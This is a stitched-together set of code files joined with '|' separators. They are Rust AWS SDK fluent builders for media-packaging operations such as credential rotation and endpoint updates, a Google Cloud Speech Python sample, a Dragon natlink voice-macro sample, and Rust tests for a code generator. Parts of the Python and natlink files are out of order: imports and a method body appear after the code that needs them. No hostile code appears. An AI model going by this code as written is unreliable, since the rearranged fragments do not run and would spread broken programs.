aws_smithy_http::result::SdkError<crate::error::ListTagsForResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
#[allow(missing_docs)] // documentation missing in model
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
#[allow(missing_docs)] // documentation missing in model
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
}
/// Fluent builder constructing a request to `RotateChannelCredentials`.
///
    /// Changes the Channel's first IngestEndpoint's username and password. WARNING - This API is deprecated. Please use RotateIngestEndpointCredentials instead.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct RotateChannelCredentials {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::rotate_channel_credentials_input::Builder,
}
impl RotateChannelCredentials {
/// Creates a new `RotateChannelCredentials`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::RotateChannelCredentialsOutput,
aws_smithy_http::result::SdkError<crate::error::RotateChannelCredentialsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the channel to update.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the channel to update.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `RotateIngestEndpointCredentials`.
///
/// Rotate the IngestEndpoint's username and password, as specified by the IngestEndpoint's id.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct RotateIngestEndpointCredentials {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::rotate_ingest_endpoint_credentials_input::Builder,
}
impl RotateIngestEndpointCredentials {
/// Creates a new `RotateIngestEndpointCredentials`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::RotateIngestEndpointCredentialsOutput,
aws_smithy_http::result::SdkError<crate::error::RotateIngestEndpointCredentialsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the channel the IngestEndpoint is on.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the channel the IngestEndpoint is on.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
        /// The ID of the IngestEndpoint whose credentials should be rotated.
pub fn ingest_endpoint_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.ingest_endpoint_id(input.into());
self
}
        /// The ID of the IngestEndpoint whose credentials should be rotated.
pub fn set_ingest_endpoint_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_ingest_endpoint_id(input);
self
}
}
/// Fluent builder constructing a request to `TagResource`.
///
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct TagResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::tag_resource_input::Builder,
}
impl TagResource {
/// Creates a new `TagResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::TagResourceOutput,
aws_smithy_http::result::SdkError<crate::error::TagResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
#[allow(missing_docs)] // documentation missing in model
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
#[allow(missing_docs)] // documentation missing in model
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
/// Adds a key-value pair to `Tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
#[allow(missing_docs)] // documentation missing in model
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
#[allow(missing_docs)] // documentation missing in model
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
}
/// Fluent builder constructing a request to `UntagResource`.
///
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UntagResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::untag_resource_input::Builder,
}
impl UntagResource {
/// Creates a new `UntagResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UntagResourceOutput,
aws_smithy_http::result::SdkError<crate::error::UntagResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
#[allow(missing_docs)] // documentation missing in model
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
#[allow(missing_docs)] // documentation missing in model
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
/// Appends an item to `TagKeys`.
///
/// To override the contents of this collection use [`set_tag_keys`](Self::set_tag_keys).
///
        /// The key(s) of the tags to be deleted.
pub fn tag_keys(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.tag_keys(input.into());
self
}
        /// The key(s) of the tags to be deleted.
pub fn set_tag_keys(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_tag_keys(input);
self
}
}
/// Fluent builder constructing a request to `UpdateChannel`.
///
/// Updates an existing Channel.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UpdateChannel {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::update_channel_input::Builder,
}
impl UpdateChannel {
/// Creates a new `UpdateChannel`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UpdateChannelOutput,
aws_smithy_http::result::SdkError<crate::error::UpdateChannelError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// A short text description of the Channel.
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// A short text description of the Channel.
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// The ID of the Channel to update.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the Channel to update.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `UpdateOriginEndpoint`.
///
/// Updates an existing OriginEndpoint.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UpdateOriginEndpoint {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::update_origin_endpoint_input::Builder,
}
impl UpdateOriginEndpoint {
/// Creates a new `UpdateOriginEndpoint`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UpdateOriginEndpointOutput,
aws_smithy_http::result::SdkError<crate::error::UpdateOriginEndpointError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// CDN Authorization credentials
pub fn authorization(mut self, input: crate::model::Authorization) -> Self {
self.inner = self.inner.authorization(input);
self
}
/// CDN Authorization credentials
pub fn set_authorization(
mut self,
input: std::option::Option<crate::model::Authorization>,
) -> Self {
self.inner = self.inner.set_authorization(input);
self
}
/// A Common Media Application Format (CMAF) packaging configuration.
pub fn cmaf_package(
mut self,
input: crate::model::CmafPackageCreateOrUpdateParameters,
) -> Self {
self.inner = self.inner.cmaf_package(input);
self
}
/// A Common Media Application Format (CMAF) packaging configuration.
pub fn set_cmaf_package(
mut self,
input: std::option::Option<crate::model::CmafPackageCreateOrUpdateParameters>,
) -> Self {
self.inner = self.inner.set_cmaf_package(input);
self
}
/// A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
pub fn dash_package(mut self, input: crate::model::DashPackage) -> Self {
self.inner = self.inner.dash_package(input);
self
}
/// A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
pub fn set_dash_package(
mut self,
input: std::option::Option<crate::model::DashPackage>,
) -> Self {
self.inner = self.inner.set_dash_package(input);
self
}
/// A short text description of the OriginEndpoint.
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// A short text description of the OriginEndpoint.
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// An HTTP Live Streaming (HLS) packaging configuration.
pub fn hls_package(mut self, input: crate::model::HlsPackage) -> Self {
self.inner = self.inner.hls_package(input);
self
}
/// An HTTP Live Streaming (HLS) packaging configuration.
pub fn set_hls_package(
mut self,
input: std::option::Option<crate::model::HlsPackage>,
) -> Self {
self.inner = self.inner.set_hls_package(input);
self
}
/// The ID of the OriginEndpoint to update.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the OriginEndpoint to update.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// A short string that will be appended to the end of the Endpoint URL.
pub fn manifest_name(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.manifest_name(input.into());
self
}
/// A short string that will be appended to the end of the Endpoint URL.
pub fn set_manifest_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_manifest_name(input);
self
}
/// A Microsoft Smooth Streaming (MSS) packaging configuration.
pub fn mss_package(mut self, input: crate::model::MssPackage) -> Self {
self.inner = self.inner.mss_package(input);
self
}
/// A Microsoft Smooth Streaming (MSS) packaging configuration.
pub fn set_mss_package(
mut self,
input: std::option::Option<crate::model::MssPackage>,
) -> Self {
self.inner = self.inner.set_mss_package(input);
self
}
        /// Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
pub fn origination(mut self, input: crate::model::Origination) -> Self {
self.inner = self.inner.origination(input);
self
}
        /// Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
pub fn set_origination(
mut self,
input: std::option::Option<crate::model::Origination>,
) -> Self {
self.inner = self.inner.set_origination(input);
self
}
/// Maximum duration (in seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
pub fn startover_window_seconds(mut self, input: i32) -> Self {
self.inner = self.inner.startover_window_seconds(input);
self
}
/// Maximum duration (in seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
pub fn set_startover_window_seconds(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_startover_window_seconds(input);
self
}
/// Amount of delay (in seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
pub fn time_delay_seconds(mut self, input: i32) -> Self {
self.inner = self.inner.time_delay_seconds(input);
self
}
/// Amount of delay (in seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
pub fn set_time_delay_seconds(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_time_delay_seconds(input);
self
}
/// Appends an item to `Whitelist`.
///
/// To override the contents of this collection use [`set_whitelist`](Self::set_whitelist).
///
/// A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
pub fn whitelist(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.whitelist(input.into());
self
}
/// A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
pub fn set_whitelist(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_whitelist(input);
self
}
}
}
impl Client {
/// Creates a client with the given service config and connector override.
pub fn from_conf_conn<C, E>(conf: crate::Config, conn: C) -> Self
where
C: aws_smithy_client::bounds::SmithyConnector<Error = E> + Send + 'static,
E: Into<aws_smithy_http::result::ConnectorError>,
{
let retry_config = conf.retry_config.as_ref().cloned().unwrap_or_default();
let timeout_config = conf.timeout_config.as_ref().cloned().unwrap_or_default();
let sleep_impl = conf.sleep_impl.clone();
let mut builder = aws_smithy_client::Builder::new()
.connector(aws_smithy_client::erase::DynConnector::new(conn))
.middleware(aws_smithy_client::erase::DynMiddleware::new(
crate::middleware::DefaultMiddleware::new(),
));
builder.set_retry_config(retry_config.into());
builder.set_timeout_config(timeout_config);
if let Some(sleep_impl) = sleep_impl {
builder.set_sleep_impl(Some(sleep_impl));
}
let client = builder.build();
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
/// Creates a new client from a shared config.
#[cfg(any(feature = "rustls", feature = "native-tls"))]
pub fn new(sdk_config: &aws_types::sdk_config::SdkConfig) -> Self {
Self::from_conf(sdk_config.into())
}
/// Creates a new client from the service [`Config`](crate::Config).
#[cfg(any(feature = "rustls", feature = "native-tls"))]
pub fn from_conf(conf: crate::Config) -> Self {
let retry_config = conf.retry_config.as_ref().cloned().unwrap_or_default();
let timeout_config = conf.timeout_config.as_ref().cloned().unwrap_or_default();
let sleep_impl = conf.sleep_impl.clone();
let mut builder = aws_smithy_client::Builder::dyn_https().middleware(
aws_smithy_client::erase::DynMiddleware::new(
crate::middleware::DefaultMiddleware::new(),
),
);
builder.set_retry_config(retry_config.into());
builder.set_timeout_config(timeout_config);
// the builder maintains a try-state. To avoid suppressing the warning when sleep is unset,
// only set it if we actually have a sleep impl.
if let Some(sleep_impl) = sleep_impl {
builder.set_sleep_impl(Some(sleep_impl));
}
let client = builder.build();
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
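    // A minimal construction sketch for the two entry points above (illustrative
    // only; loading the shared config via `aws_config::load_from_env()` happens in
    // the calling crate and is an assumption, not something defined here):
    //
    //     let sdk_config = aws_config::load_from_env().await;
    //     let client = Client::new(&sdk_config);
    //     // or, with an explicit service config:
    //     let client = Client::from_conf(crate::Config::builder().build());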
} | /// - [`hls_ingest(Option<HlsIngest>)`](crate::output::RotateChannelCredentialsOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::RotateChannelCredentialsOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::RotateChannelCredentialsOutput::ingress_access_logs): Configure ingress access logging. |
speech_transcribe_async.py | #!/usr/bin/env python
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| from google.cloud.speech import types
def long_running_recognize_gcs(
gcs_uri='gs://cloud-sample-data/speech/brooklyn.raw',
language_code='en-US'
):
"""Asynchronously transcribes the audio file specified by the gcs_uri.
Args:
gcs_uri: Path to audio file in Google Cloud Storage
e.g. gs://BUCKET/FILE
language_code: The language of the supplied audio as
a BCP-47 language tag, e.g. 'en-US'
"""
client = speech.SpeechClient()
audio = types.RecognitionAudio(uri=gcs_uri)
config = types.RecognitionConfig(
# This is a comment describing one of the fields being set
encoding=enums.RecognitionConfig.AudioEncoding.FLAC,
sample_rate_hertz=16000,
language_code=language_code)
operation = client.long_running_recognize(config, audio)
print('Waiting for operation to complete...')
response = operation.result(timeout=90)
# Each result is for a consecutive portion of the audio. Iterate through
# them to get the transcripts for the entire audio file.
for result in response.results:
# The first alternative is the most likely one for this portion.
print(u'Transcript: {}'.format(result.alternatives[0].transcript))
print('Confidence: {}'.format(result.alternatives[0].confidence))
# [END speech_transcribe_async_gcs]
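# A minimal invocation sketch (the argparse CLI wrapper is omitted here; the
# argument values below just repeat the defaults already used above):
#
#     if __name__ == '__main__':
#         long_running_recognize_gcs(
#             gcs_uri='gs://cloud-sample-data/speech/brooklyn.raw',
#             language_code='en-US')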
# import argparse | # [START speech_transcribe_async_gcs]
from google.cloud import speech
from google.cloud.speech import enums |
_globals.py | #
# Python Macro Language for Dragon NaturallySpeaking
# (c) Copyright 1999 by Joel Gould
# Portions (c) Copyright 1999 by Dragon Systems, Inc.
#
# _globals.py
# Sample macro file which is active all the time (not application specific).
#
# April 25, 1999
# - packaged for external release
#
# March 3, 1999
# - initial version
#
############################################################################
#
# This is a sample grammar file. I have implemented some basic global
# commands for example purposes.
#
# This file is loaded automatically when the Python subsystem starts because
# its filename begins with an underscore (the signal for a global module).
#
# Please see the example wordpad.py for more comments.
#
import natlink
from natlinkutils import *
class ThisGrammar(GrammarBase):
# We create a simple grammar to illustrate a couple of basic ideas.
# You can say "Python microphone off" or "Python go to sleep" which
# have exactly the same effect as "microphone off" and "go to sleep".
#
# You can also say "Python stop listening" which simulates sleeping
# by putting the system into a state where the only thing which will
# be recognized is "Python start listening"
testGram = """
<micOff> = Python microphone off;
<sleep> = Python go to sleep;
<stop> = Python stop listening;
<notListening> exported = Python start listening;
<normalState> exported = <micOff> | <sleep> | <stop>;
"""
# Load the grammar and activate the rule "normalState". We use
# activateSet instead of activate because activateSet is an efficient
# way of saying "deactivateAll" then "activate(xxx)" for every xxx
# in the array.
def initialize(self):
|
# When words are recognized from the rule "micOff", this function gets
# called. We turn the microphone off.
def gotResults_micOff(self,words,fullResults):
natlink.setMicState('off')
# When words are recognized from the rule "sleep", this function gets
# called. We put the microphone in the sleeping state. This will
# cause the built-in NatSpeak global commands module to activate a
# special "wake-up" state in exclusive mode. We have no control
# over this (although we could activate our own exclusive rule at the
# same time).
def gotResults_sleep(self,words,fullResults):
natlink.setMicState('sleeping')
# For the rule "stop", we activate the "notListening" rule which
# contains only one subrule. We also force exclusive state for this
# grammar which turns off all other non-exclusive grammar in the system.
def gotResults_stop(self,words,fullResults):
self.activateSet(['notListening'],exclusive=1)
# When we get "start listening", restore the default state of this
# grammar.
def gotResults_notListening(self,words,fullResults):
self.activateSet(['normalState'],exclusive=0)
#
# Here is the initialization and termination code. See wordpad.py for more
# comments.
#
thisGrammar = ThisGrammar()
thisGrammar.initialize()
def unload():
global thisGrammar
if thisGrammar: thisGrammar.unload()
thisGrammar = None
| self.load(self.testGram)
self.activateSet(['normalState'])
self.setExclusive(0) |
codegen.rs | use codegen_rs::*;
#[test]
fn empty_scope() {
let scope = Scope::new();
assert_eq!(scope.to_string(), "");
}
#[test]
fn single_struct() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.field("one", "usize")
.field("two", "String");
let expect = r#"
struct Foo {
one: usize,
two: String,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_pushed_field() {
let mut scope = Scope::new();
let mut struct_ = Struct::new("Foo");
let field = Field::new("one", "usize");
struct_.push_field(field);
scope.push_struct(struct_);
let expect = r#"
struct Foo {
one: usize,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn single_struct_documented_field() {
let mut scope = Scope::new();
let doc = vec!["Field's documentation", "Second line"];
let mut struct_ = Struct::new("Foo");
let mut field1 = Field::new("one", "usize");
field1.doc(doc.clone());
struct_.push_field(field1);
let mut field2 = Field::new("two", "usize");
field2.annotation(vec![r#"#[serde(rename = "bar")]"#]);
struct_.push_field(field2);
let mut field3 = Field::new("three", "usize");
field3.doc(doc).annotation(vec![
r#"#[serde(skip_serializing)]"#,
r#"#[serde(skip_deserializing)]"#,
]);
struct_.push_field(field3);
scope.push_struct(struct_);
let expect = r#"
struct Foo {
/// Field's documentation
/// Second line
one: usize,
#[serde(rename = "bar")]
two: usize,
/// Field's documentation
/// Second line
#[serde(skip_serializing)]
#[serde(skip_deserializing)]
three: usize,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn single_fn() {
let mut scope = Scope::new();
scope
.new_fn("my_fn")
.vis("pub")
.arg("foo", Type::new("uint"))
.ret(Type::new("uint"))
.line("let res = foo + 1;")
.line("res");
let expect = r#"
pub fn my_fn(foo: uint) -> uint {
let res = foo + 1;
res
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn empty_struct() {
let mut scope = Scope::new();
scope.new_struct("Foo");
let expect = r#"
struct Foo;"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn two_structs() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.field("one", "usize")
.field("two", "String");
scope.new_struct("Bar").field("hello", "World");
let expect = r#"
struct Foo {
one: usize,
two: String,
}
struct Bar {
hello: World,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_derive() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.derive("Debug")
.derive("Clone")
.field("one", "usize")
.field("two", "String");
let expect = r#"
#[derive(Debug, Clone)]
struct Foo {
one: usize,
two: String,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_repr() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.repr("C")
.field("one", "u8")
.field("two", "u8");
let expect = r#"
#[repr(C)]
struct Foo {
one: u8,
two: u8,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_allow() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.allow("dead_code")
.field("one", "u8")
.field("two", "u8");
let expect = r#"
#[allow(dead_code)]
struct Foo {
one: u8,
two: u8,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_generics_1() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T")
.generic("U")
.field("one", "T")
.field("two", "U");
let expect = r#"
struct Foo<T, U> {
one: T,
two: U,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_generics_2() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T, U")
.field("one", "T")
.field("two", "U");
let expect = r#"
struct Foo<T, U> {
one: T,
two: U,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_generics_3() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T: Win, U")
.field("one", "T")
.field("two", "U");
let expect = r#"
struct Foo<T: Win, U> {
one: T,
two: U,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_where_clause_1() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T")
.bound("T", "Foo")
.field("one", "T");
let expect = r#"
struct Foo<T>
where T: Foo,
{
one: T,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_where_clause_2() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T, U")
.bound("T", "Foo")
.bound("U", "Baz")
.field("one", "T")
.field("two", "U");
let expect = r#"
struct Foo<T, U>
where T: Foo,
U: Baz,
{
one: T,
two: U,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_doc() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.doc(
"Hello, this is a doc string\n\
that continues on another line.",
)
.field("one", "T");
let expect = r#"
/// Hello, this is a doc string
/// that continues on another line.
struct Foo {
one: T,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_in_mod() {
let mut scope = Scope::new();
{
let module = scope.new_module("foo");
module
.new_struct("Foo")
.doc("Hello some docs")
.derive("Debug")
.generic("T, U")
.bound("T", "SomeBound")
.bound("U", "SomeOtherBound") |
let expect = r#"
mod foo {
/// Hello some docs
#[derive(Debug)]
struct Foo<T, U>
where T: SomeBound,
U: SomeOtherBound,
{
one: T,
two: U,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_mod_import() {
let mut scope = Scope::new();
scope
.new_module("foo")
.import("bar", "Bar")
.new_struct("Foo")
.field("bar", "Bar");
let expect = r#"
mod foo {
use bar::Bar;
struct Foo {
bar: Bar,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_repr() {
let mut scope = Scope::new();
scope
.new_enum("IpAddrKind")
.repr("u8")
.push_variant(Variant::new("V4"))
.push_variant(Variant::new("V6"));
let expect = r#"
#[repr(u8)]
enum IpAddrKind {
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_allow() {
let mut scope = Scope::new();
scope
.new_enum("IpAddrKind")
.allow("dead_code")
.push_variant(Variant::new("V4"))
.push_variant(Variant::new("V6"));
let expect = r#"
#[allow(dead_code)]
enum IpAddrKind {
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_non_exhaustive() {
let mut scope = Scope::new();
let ip_addr_kind_enum = scope
.new_enum("IpAddrKind")
.push_variant(Variant::new("V4"))
.push_variant(Variant::new("V6"));
ip_addr_kind_enum
.type_def_mut()
.r#macro("#[non_exhaustive]");
let expect = r#"
#[non_exhaustive]
enum IpAddrKind {
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_variant_doc() {
let mut scope = Scope::new();
let mut v = Variant::new("V4");
v.doc("best");
scope
.new_enum("IpAddrKind")
.push_variant(v)
.push_variant(Variant::new("V6"));
let expect = r#"
enum IpAddrKind {
/// best
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn scoped_imports() {
let mut scope = Scope::new();
scope
.new_module("foo")
.import("bar", "Bar")
.import("bar", "baz::Baz")
.import("bar::quux", "quuux::Quuuux")
.new_struct("Foo")
.field("bar", "Bar")
.field("baz", "baz::Baz")
.field("quuuux", "quuux::Quuuux");
let expect = r#"
mod foo {
use bar::{Bar, baz};
use bar::quux::quuux;
struct Foo {
bar: Bar,
baz: baz::Baz,
quuuux: quuux::Quuuux,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn module_mut() {
let mut scope = Scope::new();
scope.new_module("foo").import("bar", "Bar");
scope
.get_module_mut("foo")
.expect("module_mut")
.new_struct("Foo")
.field("bar", "Bar");
let expect = r#"
mod foo {
use bar::Bar;
struct Foo {
bar: Bar,
}
}"#;
